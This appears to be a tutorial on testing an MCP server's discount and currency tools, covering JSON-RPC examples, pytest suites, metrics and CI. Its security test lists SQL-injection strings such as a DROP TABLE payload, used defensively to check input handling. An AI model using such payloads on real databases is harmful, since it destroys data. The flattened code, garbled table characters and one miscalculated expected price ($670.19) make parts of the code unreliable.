"name": "calculate_discount",
"arguments": {
"original_price": 100.00,
"discount_percent": 150
}
}
}
// Expected Response
{
"jsonrpc": "2.0",
"id": 3,
"error": {
"code": -32602,
"message": "Invalid params",
"data": {
"details": "Discount percent must be between 0 and 100"
}
}
}
// Request
{
"jsonrpc": "2.0",
"id": 4,
"method": "tools/call",
"params": {
"name": "currency_converter",
"arguments": {
"amount": 100.00,
"from_currency": "USD",
"to_currency": "EUR"
}
}
}
// Expected Response
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"content": [ {
"type": "text",
"text": "100.00 USD = 85.00 EUR"
}
]
}
}
// Request
{
"jsonrpc": "2.0",
"id": 5,
"method": "tools/call",
"params": {
"name": "currency_converter",
"arguments": {
"amount": 100.00,
"from_currency": "USD",
"to_currency": "XYZ" // Invalid currency
}
}
}
// Expected Response
{
"jsonrpc": "2.0",
"id": 5,
"error": {
"code": -32602,
"message": "Invalid params",
"data": {
"details": "Unsupported currency: XYZ"
}
}
}
| Test | Status | Notes |
|---|---|---|
| Server starts successfully | β / β | |
| Tools/list returns 2 tools | β / β | |
| Discount: Valid input works | β / β | |
| Discount: Negative price fails | β / β | |
| Discount:>100% fails | β / β | |
| Currency: Valid conversion works | β / β | |
| Currency: Invalid code fails | β / β | |
| Non-existent tool returns error | β / β |
Task:Manually test the following scenarios and document results:
For each test, record: input, expected output, actual output, pass/fail
Now let's automate our tests using Pytest.
[pytest] testpaths=tests python_files=test_*.py python_classes=Test* python_functions=test_* asyncio_mode=auto markers=unit: Unit tests integration: Integration tests security: Security tests performance: Performance tests
"" "
Pytest fixtures for MCP server testing "" "
import pytest from mcp.client import Client import asyncio @pytest.fixture async def mcp_client(): "" "Create MCP client connected to test server" ""
client=Client() await client.connect() yield client await client.disconnect() @pytest.fixture def sample_discount_params(): "" "Sample valid parameters for discount tool" ""
return {
"original_price": 100.00,
"discount_percent": 20
}
@pytest.fixture def sample_currency_params(): "" "Sample valid parameters for currency tool" ""
return {
"amount": 100.00,
"from_currency": "USD",
"to_currency": "EUR"
}
"" "
Functional tests for discount calculator tool "" "
import pytest @pytest.mark.unit async def test_calculate_discount_valid_input(mcp_client, sample_discount_params): "" "Test discount calculation with valid inputs" ""
result=await mcp_client.call_tool("calculate_discount",
sample_discount_params) assert "result" in result assert "Discounted price: $80.00" in result["result"]["content"][0]["text"] @pytest.mark.unit async def test_calculate_discount_zero_percent(mcp_client): "" "Test with 0% discount" ""
result=await mcp_client.call_tool("calculate_discount",
{
"original_price": 100.00, "discount_percent": 0
}) assert "Discounted price: $100.00" in result["result"]["content"][0]["text"] @pytest.mark.unit async def test_calculate_discount_hundred_percent(mcp_client): "" "Test with 100% discount" ""
result=await mcp_client.call_tool("calculate_discount",
{
"original_price": 100.00, "discount_percent": 100
}) assert "Discounted price: $0.00" in result["result"]["content"][0]["text"] @pytest.mark.unit async def test_calculate_discount_negative_price(mcp_client): "" "Test that negative price returns error" ""
with pytest.raises(ValueError, match="cannot be negative"): await mcp_client.call_tool("calculate_discount",
{
"original_price": -50.00, "discount_percent": 20
}) @pytest.mark.unit async def test_calculate_discount_invalid_percent(mcp_client): "" "Test that discount > 100 returns error" ""
with pytest.raises(ValueError, match="must be between 0 and 100"): await mcp_client.call_tool("calculate_discount",
{
"original_price": 100.00, "discount_percent": 150
}) @pytest.mark.unit async def test_calculate_discount_missing_field(mcp_client): "" "Test that missing required field returns error" ""
with pytest.raises(Exception): # Should be validation error await mcp_client.call_tool("calculate_discount",
{
"original_price": 100.00
}
# Missing discount_percent) @pytest.mark.unit @pytest.mark.parametrize("price,discount,expected", [ (100, 10, "$90.00"),
(50.50, 25, "$37.88"),
(999.99, 33, "$670.19"),
(0.01, 50, "$0.01"),
]) async def test_calculate_discount_parametrized(mcp_client, price, discount, expected): "" "Test multiple discount scenarios" ""
result=await mcp_client.call_tool("calculate_discount",
{
"original_price": price, "discount_percent": discount
}) assert expected in result["result"]["content"][0]["text"]
"" "
Contract tests for MCP server "" "
import pytest import jsonschema @pytest.mark.integration async def test_tools_list_contract(mcp_client): "" "Verify tools/list response matches contract" ""
expected_schema= {
"type": "object",
"properties": {
"tools": {
"type": "array",
"minItems": 2,
"items": {
"type": "object",
"properties": {
"name": {
"type": "string"
}
,
"description": {
"type": "string"
}
,
"inputSchema": {
"type": "object"
}
}
,
"required": ["name",
"inputSchema"]
}
}
}
,
"required": ["tools"]
}
result=await mcp_client.list_tools() jsonschema.validate(result, expected_schema) @pytest.mark.integration async def test_tool_response_structure(mcp_client): "" "Verify tool call response structure" ""
result=await mcp_client.call_tool("calculate_discount",
{
"original_price": 100, "discount_percent": 20
}) # Check JSON-RPC structure assert "jsonrpc" in result assert result["jsonrpc"]=="2.0"
assert "id" in result assert "result" in result # Check result structure assert "content" in result["result"] assert isinstance(result["result"]["content"], list) assert len(result["result"]["content"])>0 assert result["result"]["content"][0]["type"]=="text"
assert "text" in result["result"]["content"][0]
"" "
Performance tests for MCP server "" "
import pytest import asyncio import time import numpy as np @pytest.mark.performance async def test_response_time(mcp_client): "" "Test that response time is under 100ms" ""
start=time.time() await mcp_client.call_tool("calculate_discount",
{
"original_price": 100, "discount_percent": 20
}) end=time.time() response_time=(end - start) * 1000 # Convert to ms assert response_time < 100,
f"Response time {response_time}ms exceeds 100ms"
@pytest.mark.performance async def test_concurrent_requests(mcp_client): "" "Test server handles 10 concurrent requests" ""
async def make_request(): return await mcp_client.call_tool("calculate_discount",
{
"original_price": 100, "discount_percent": 20
}) # Execute 10 concurrent requests tasks=[make_request() for _ in range(10)] results=await asyncio.gather(*tasks) # Verify all succeeded assert len(results)==10 for result in results: assert "result" in result @pytest.mark.performance async def test_latency_percentiles(mcp_client): "" "Measure p50, p95, p99 latency" ""
latencies=[] for _ in range(100): start=time.time() await mcp_client.call_tool("calculate_discount",
{
"original_price": 100, "discount_percent": 20
}) end=time.time() latencies.append((end - start) * 1000) p50=np.percentile(latencies, 50) p95=np.percentile(latencies, 95) p99=np.percentile(latencies, 99) print(f"\nLatency percentiles:") print(f" p50: {p50:.2f}ms") print(f" p95: {p95:.2f}ms") print(f" p99: {p99:.2f}ms") assert p95 < 100,
f"p95 latency {p95}ms exceeds target"
assert p99 < 500,
f"p99 latency {p99}ms exceeds target"
"" "
Security tests for MCP server "" "
import pytest @pytest.mark.security async def test_sql_injection_in_params(mcp_client): "" "Test SQL injection attempts are handled safely" ""
sql_injections=[ "'; DROP TABLE users; --",
"1' OR '1'='1",
"admin' --",
] for injection in sql_injections: # Should handle gracefully - either reject or sanitize try: result=await mcp_client.call_tool("calculate_discount",
{
"original_price": injection, "discount_percent": 20
}) # If it succeeds,
check result doesn't contain injection
assert "DROP TABLE" not in str(result) except Exception: # Error is acceptable - server rejected malicious input pass @pytest.mark.security async def test_large_payload(mcp_client): "" "Test server handles large payloads safely" ""
large_value="X" * 1_000_000 with pytest.raises(Exception): # Should reject or timeout await mcp_client.call_tool("calculate_discount",
{
"original_price": large_value, "discount_percent": 20
})
# Run all tests $ pytest # Run specific test file $ pytest tests/test_discount.py # Run tests by marker $ pytest -m unit $ pytest -m security # Run with verbose output $ pytest -v # Run with coverage $ pytest --cov=src --cov-report=html
Task:Write test cases for the currency_converter tool covering:
Use the discount tests as a template !
Production MCP servers need comprehensive observability: logs, metrics, and traces.
import logging import json from datetime import datetime # Structured logging for MCP server logger=logging.getLogger("mcp_server") def log_tool_call(tool_name: str, params: dict, duration_ms: float, success: bool): "" "Log structured tool call data" ""
log_entry= {
"timestamp": datetime.utcnow().isoformat(),
"event": "tool_call",
"tool": tool_name,
"params": params,
"duration_ms": duration_ms,
"success": success
}
logger.info(json.dumps(log_entry))
from prometheus_client import Counter,
Histogram # Define metrics tool_calls_total=Counter('mcp_tool_calls_total',
'Total tool calls',
['tool_name', 'status']) tool_duration_seconds=Histogram('mcp_tool_duration_seconds',
'Tool execution duration',
['tool_name']) # Use in code tool_calls_total.labels(tool_name="calculate_discount", status="success").inc() tool_duration_seconds.labels(tool_name="calculate_discount").observe(0.05)
# .github/workflows/test.yml name: MCP Server Tests on: [push,
pull_request] jobs: test: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - name: Set up Python uses: actions/setup-python@v2 with: python-version: '3.11'
- name: Install dependencies run: | pip install -r requirements.txt pip install pytest pytest-cov - name: Run unit tests run: pytest -m unit --cov=src - name: Run integration tests run: pytest -m integration - name: Run security tests run: pytest -m security - name: Check coverage run: pytest --cov=src --cov-fail-under=80 - name: Contract tests (breaking change detection) run: pytest tests/test_contract.py --strict
Test server resilience under failure conditions:
import pytest import asyncio @pytest.mark.chaos async def test_server_restart_resilience(mcp_client): "" "Test client handles server restart" ""
# Make initial call result1=await mcp_client.call_tool("calculate_discount", {
...
}) assert "result" in result1 # Simulate server restart await server.restart() await asyncio.sleep(1) # Reconnect and retry await mcp_client.reconnect() result2=await mcp_client.call_tool("calculate_discount", {
...
}) assert "result" in result2 @pytest.mark.chaos async def test_network_partition(mcp_client): "" "Test behavior during network issues" ""
# Inject network delay with network_delay(500): # 500ms delay result=await mcp_client.call_tool("calculate_discount", {
...
}) # Should still succeed but be slower @pytest.mark.chaos async def test_resource_exhaustion(mcp_client): "" "Test server under resource pressure" ""
# Fill server memory with high_memory_pressure(): # Server should still respond result=await mcp_client.call_tool("calculate_discount", {
...
}) assert "result" in result or "error" in result
def test_backward_compatibility(): "" "Test new server version with old client" ""
# V1 client v1_client=MCPClient(protocol_version="1.0") # V2 server (with new optional fields) v2_server=MCPServer(protocol_version="2.0") # V1 client should still work with V2 server result=v1_client.call_tool("calculate_discount",
{
"original_price": 100, "discount_percent": 20
}
# Not using new V2 fields) assert "result" in result
Advanced testing goes beyond functional validation. Focus on observability, automation, resilience, and maintaining compatibility as your system evolves.
Test your understanding of MCP server testing. Select the best answer for each question.